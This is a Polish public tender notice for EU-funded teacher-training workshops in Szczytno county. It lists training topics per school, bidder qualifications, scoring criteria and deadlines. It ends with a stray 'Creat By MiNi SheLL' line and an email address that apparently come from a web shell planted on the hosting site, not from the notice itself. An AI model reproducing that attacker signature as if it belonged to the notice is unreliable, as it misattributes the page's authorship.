Profilaktyka wypalenia zawodowego oraz radzenia sobie z jego objawami
Konstruktywne radzenia sobie ze stresem oraz wypaleniem zawodowym, tworzenie własnych strategii radzenia sobie w trudnych sytuacjach zawodowych
Tab. nr33 Doskonalenie pracy n-li ze SP w Olszynach
Obszar doskon: Nauczyciel + 45
 Profilaktyka wypalenia zawodowego
Warsztaty kształtujące umiejętności posługiwania się tablicą multimedialną- od podstaw wykorzystania na lekcjach - I-III, IV-VI, praca w grupach
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW.
Tab nr34 Doskonalenie pracy n-li ze SP Nr 6 w Szczytnie - grupa I i II
Obszar doskon: Nauczyciel + 45
 Komunikacja interpersonalna, emisja głosu oraz asertywności.
 Wzmacnianie sił psychicznych i odporności na stres.
 Pobudzania aktywności twórczej n-li w organizowaniu procesu lekcyjnego.
Utrzymywanie wysokiej motywacji w zawodzie.
Tab nr35 Doskonalenie pracy n-li z Gimnazjum Nr 1 w Szczytnie - grupa I i II 
Obszar doskon: Nauczyciel + 45
 Zajęcia integrujące zespół n-li , budujące empatię i poczucie zaufania w grupie.
 Komunikacji interpersonalna nauczyciel - uczeń - rodzic .Wypracowanie kontraktu trójstronnej  komunikacji.
Trening wzmacniania sił psychicznych i odpornościowych na stres. Techniki relaksacyjne i redukujące stres.
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW.
Tab nr36 Doskonalenie pracy n-li ze SP w Wielbarku
Obszar doskon: Nauczyciel + 45
 Komunikacja interpersonalna, emisja głosu oraz asertywności
 Wzmacniania kondycji psychofizycznej n-li w profilaktyce zjawiska wypalenia zawodowego, jak radzić sobie w sytuacjach trudnych z rodzicami konfliktowymi, roszczeniowymi
Opanowania umiejętności wykorzystania zasobów oraz programów komputerowych do obróbki plików audio-wideo i urządzeń multimedialnych
Część XI
Tab nr37 Doskonalenie pracy n-li - Edukacja filmowa na lekcjach
Obszar doskon: Edukacja filmowa na lekcjach j. polskiego i na innych przedmiotach.
Praca z uczniami metodą projektów z wykorzystaniem platformy etwinning.pl.
 jak napisać projekt
 jak nawiązać kontakt, współpracę  z inną szkoła w Polsce lub za granicą
 praca na platformie etwinning.pl, umieszczanie zdjęć, filmików
Proces powstawania filmu  - na potrzeby szkolne
 kolejne etapy powstawania filmu, komórka czy kamera, wgranie do komputera, jaki program służy do obróbki krótkich filmików z uroczystości klasowych
praca z programem do obróbki filmów, jaki program wybrać i jak go obsługiwać, składanie części, dodawanie napisów, dźwięków itd. Na potrzeby dokumentowania życia klasy szkolnej przez wychowawcę, n-la, uczniów
prezentacja wykonanych filmików przez uczestników sieci w swoich szkołach, które przerobią czy opracują na spotkaniu z ekspertem
Warsztat filmowy z psychologiem lub innym specjalistą na temat skutecznych sposobów budowania motywacji uczniów do nauki oraz mechanizmów wpływających na funkcjonowanie n-li i uczniów w szkole  w oparciu o film
poznanie sposobów budowania motywacji uczniów do nauki oraz mechanizmów wpływających na funkcjonowanie n-li i uczniów w szkole w oparciu o film
propozycja filmów poruszających tematykę  problemów wychowawczych wraz z obudową merytoryczną
Część XII
Tab nr 38 Doskonalenie pracy n-li - Praca z uczniem zdolnym
Diagnozowanie szczególnych zdolności uczniów:
Kim jest uczeń zdolny? - Cechy ucznia zdolnego.
Rodzaje zdolności.
Sposoby diagnozowania, metody, formy, narzędzia
Motywowanie ucznia zdolnego do pracy:
Motywowanie uczniów zdolnych do wykonywania zadań dla nich prostych
Motywowanie uczniów zdolnych do podejmowania nowych wyzwań
Organizacja pracy z uczniem zdolnym:
Metody, narzędzia do pracy z uczniem zdolnym na lekcji
Jak podczas jednej lekcji efektywnie pracować z  uczniem zdolnym oraz uczniem przeciętnym i uczniem z trudnościami
Indywidualizowanie pracy na lekcji
Indywidualny program nauczania i indywidualny tok nauczania
Planowanie ścieżki rozwoju uczniów zdolnych
Problemy napotykane w pracy z uczniem zdolnym i sposoby ich rozwiązania
Wykorzystywanie i ukierunkowywanie szczególnych uzdolnień uczniów:
Metody i sposoby kierunkowania uzdolnień
Wykorzystywanie zainteresowań uczniów w rozwijaniu ich zdolności
Wykorzystanie metod aktywnych i metod problemowych w pacy z uczniem zdolnym - poznanie i wykorzystanie wybranych metod
Gry i zabawy w pracy z uczniem zdolnym - poznanie wybranych gier i zabaw
Część XIII
Tab nr 39 Doskonalenie pracy n-li - Jak radzić sobie ze szkolną absencją? Bezpieczeństwo w szkole
jak tworzyć dobry zespół, role, predyspozycje
 wykorzystanie możliwości członków zespołu
 zalety i wady pracy zespołowej
 cechy efektywnej pracy zespołowej
 skuteczny przepływ informacji
 sztuka słuchania
 sztuka kierowania dyskusją
 przyczyny, rodzaje konfliktów, przykłady sytuacji konfliktowych
 skala rozwoju konfliktu, faza początkowa, eskalacja, otwarta wojna
 kierowanie konfliktem
 zapobieganie rozwojowi konfliktu
 style kierowania konfliktem
 metody rozwiązywania konfliktów, negocjacje, mediacje, arbitraż
 jak można wykorzystać konflikt? przykłady twórczego wykorzystania konfliktu.
 rodzaje negocjacji
warunki skutecznych negocjacji
style negocjacji
techniki negocjacji
Część XIV
Tab nr 40 Doskonalenie pracy dyrektorów - Rola dyrektora w promocji i budowaniu wizerunku szkoły
Wprowadzenie Rady do teorii Pubic Realation
Co to jest promocja i Pubic Realation szkoły, reputacja i wizerunek szkoły, etyka działań Pubic Realation , wewnętrzny i zewnętrzny Pubic Realation, planowanie działań promocyjnych, budowa strategii promocji szkoły, współpraca szkoły ze środowiskiem lokalnym
Wizerunek dyrektora 
Ekspozycja publiczna dyrektora, jak wyglądać, jak się zachowywać, aby jak najlepiej reprezentować placówkę, wystąpienia publiczne, jak się przygotowywać, jak przemawiać, zasada precedencji, techniki relaksacyjne. 
Media relations
Zasady współpracy z dziennikarzami, jak informować o trudnych i kryzysowych sytuacjach, jak kształtować pozytywny wizerunek szkoły w mediach, szkolna polityka medialna, jak przygotować dobry komunikat prasowy. Bank wspólnych pomysłów na wspólne działania szkół..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że należycie przeprowadził w ciągu trzech ostatnich lat  co najmniej 5 form doskonalenia (warsztatów, wykładów, konsultacji grupowych i innych) dla nauczycieli/lek, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, realizację liczby co najmniej 50 form doskonalenia  nauczycieli (wykłady, szkolenia, warsztaty, konsultacje, konferencje
Wykonawca musi przedstawić wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, datę wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że na czas realizacji umowy dysponuje/będzie dysponował osobami, które zabezpieczą kompleksową obsługę całości przedmiotu zamówienia, spełniającymi następujące wymagania:
a)	Posiadają wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym z zakresu pedagogiki lub psychologii lub nauk społecznych lub informatyki lub inne umożliwiające prowadzenie zajęć  w zakresie objętej tematyką,
b)	Posiadają kwalifikacje coacha lub trenera lub edukatora lub  doradcy metodycznego lub doradcy metodycznego konsultanta lub innego specjalisty, który  posiada minimum 3-letnie doświadczenie w merytorycznym prowadzeniu szkoleń z nauczycielami/lkami, dyrektorami/rkami,
c)	Posiadają wiedzę merytoryczną i umiejętności prowadzenia szkoleń,
d)	Doświadczenie w prowadzeniu zajęć z dorosłymi/nauczycielami/lkami,
e)	Posiadanie umiejętności w zakresie komunikacji interpersonalnej,
f)	Znajomość zasad funkcjonowania placówek oświatowych,
g)	Znajomość przepisów prawa oświatowego,
h)	Znajomość wymagań państwa wobec szkół i placówek wynikających z Rozporządzenia Ministra Edukacji Narodowej z dnia 10 maja 2013r. zmieniające rozporządzenie w sprawie nadzoru pedagogicznego,
Kwalifikacje i kompetencje ekspertów muszą być zgodne z potrzebami obszarów tematycznych oraz minimalnymi zakresami doskonalenia (podpunkt 8 w każdej z tabel w SIWZ) 
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami oraz oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień z uwzględnieniem kwalifikacji i kompetencji ekspertów, które muszą być zgodne z potrzebami obszarów tematycznych oraz minimalnymi zakresami doskonalenia (podpunkt 8 w każdej z tabel)- według załącznika nr 4.
Bezpośrednio przed zawarciem umowy należy zamawiającemu przedstawić kopię dokumentów poświadczających: - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym z zakresu pedagogiki, psychologii, nauk społecznych, informatyki lub inne umożliwiające prowadzenie zajęć  w zakresie objętej tematyką,
- kwalifikacje coacha lub trenera lub edukatora lub  doradcy metodycznego lub doradcy metodycznego konsultanta lub innego specjalisty, który  posiada minimum 5-letnie doświadczenie w merytorycznym prowadzeniu szkoleń z nauczycielami/lkami, dyrektorami/rkami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. nr 1 do SIWZ. Formularz musi być podpisany przez osobę/osoby uprawnione do składania oświadczeń woli w zakresie praw i obowiązków majątkowych wykonawcy z podaniem ceny za każdą część zamówienia, przedmiotu zamówienia.
2) Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy
3) oświadczenie o akceptacji warunków umowy (Załącznik nr 8 )
4) wzór umowy (Załącznik nr 9).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie wykonawcy (ilość przeprowadzonych form doskonalenia, 1 forma = 1 pkt.) - 30</li>
<li>3 - zasoby kadrowe wykonawcy (liczba osób przewidzianych do wykonywania zamówienia spełniających warunki, 1 osoba = 1 pkt.) - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że postanowienia umowy mogą zostać zmienione w następującym zakresie:
1) Zmniejszenie ilości zamówienia - wynikające z faktu, iż realizacja tej części stała się dla Zamawiającego nieuzasadniona społecznie lub ekonomicznie. 
2) Zmniejszenie wynagrodzenia z powodu ograniczenia zamówienia ze względu na interes publiczny, co nie było do przewidzenia w dniu zawarcia umowy
3) Zmiana VAT lub stawek celnych
4) Zmiana prawa mająca wpływ na termin lub zakres zamówienia
5) Innych niewymienionych przypadków losowych i sytuacji nie możliwych do przewidzenia w trakcie opracowywania niniejszego postępowania.
Pozostałe dopuszczalne zmiany umowy:
1. zmiany w zakresie zmiany podwykonawców (jeżeli wystąpią) w przypadku:
- rezygnacji podwykonawcy,
- zmiany wartości lub zakresu usług wykonywanych przez podwykonawców.
Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.warmia.mazury.pl/powiat_szczycienski<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno - Pedagogiczna
12-100 Szczytno ; ul. Lanca 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2014 godzina 14:00, miejsce: Poradnia Psychologiczno - Pedagogiczna
12-100 Szczytno ; ul. Lanca 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Społeczny; Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com